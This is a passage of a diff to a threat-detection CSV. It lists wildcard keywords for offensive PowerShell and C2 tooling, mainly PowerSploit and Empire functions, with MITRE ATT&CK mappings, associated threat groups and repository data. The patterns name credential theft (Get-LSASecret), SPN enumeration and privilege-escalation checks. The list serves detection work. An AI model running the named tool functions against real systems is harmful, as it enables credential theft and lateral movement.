MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetFileServer*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetForestDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetGPOGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetLocalGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetLoggedon*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetRDPSession -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetRDPSession*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetUser -SPN*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*getNimplantByGuid*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Get-LSASecret*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ModifiableService*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetComputer -Unconstrainuser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetDomainController*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*get-netfileserver -domain *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-NetFileServer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetFileServer*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetGPOGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetLocalGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetLoggedon*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetRDPSession -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetRDPSession*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetUser -SPN*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 